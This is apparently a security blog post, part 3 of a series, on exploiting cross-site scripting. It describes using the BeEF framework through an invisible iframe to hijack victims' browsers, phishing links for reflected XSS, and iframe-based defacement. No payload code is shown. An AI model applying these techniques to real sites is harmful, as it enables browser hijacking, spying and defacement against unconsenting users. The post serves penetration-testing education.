XSS Part 3: Exploitation

Posted on October 15th, 2015


In part 1 we introduced XSS, and part 2 we showed some TTPs for enumerating XSS, part 3 will be demonstrating how to take advantage of XSS.  XSS can lead to full control over an application or system because it provides the attacker the ability to run code in the victim’s browser. This code is normally HTML/JavaScript that is used to do a number of things:

  • Forge a request in an application (example: adding a user, changing a password, etc.)
  • Delivering an exploit to get code execution on the victim’s system.
  • Control the victim browser (Hijacking)
  • Deface the application

With reflected XSS you’ll likely need to get the user to click on a link with the XSS payload, such as in a phishing Email.  With stored XSS you might just need the user to use the application to have your payload loaded in the victim browser.

As we’ve mentioned in the previous post the types of payloads you’ll be able to use may depend on the defensive mechanisms in place.  You should also test your payload with a few browsers because a payload that works in Mozilla Firefox may not work in Chrome.

The Browser Exploitation Framework (BeEF)

BeEF is a penetration testing tool that targets the web browser.  It can be used in conjunction with an XSS flaw to control a victim’s browser to accomplish a number of things (deliver exploits, additional social engineering attacks, take screen shots, control the webcam, etc.).  With XSS a common way to leverage BeEF is with an iframe:


The example above effectively drops an invisible iframe on the page.  This could be leveraged with both stored or reflective XSS, but depending on the filters in place you might need to get more creative.  The screen shot below shows BeEF’s GUI:


Defacing an application could actually have a bigger impact for an organization than they may initially realize when analyzing the XSS vulnerability.  Many organizations rely on their web applications as a critical part of their business and if customers lost trust in that, they may do business elsewhere.  We can use a similar iframe payload as an example, but this time we can actually have it be visible on the screen to replace the application content.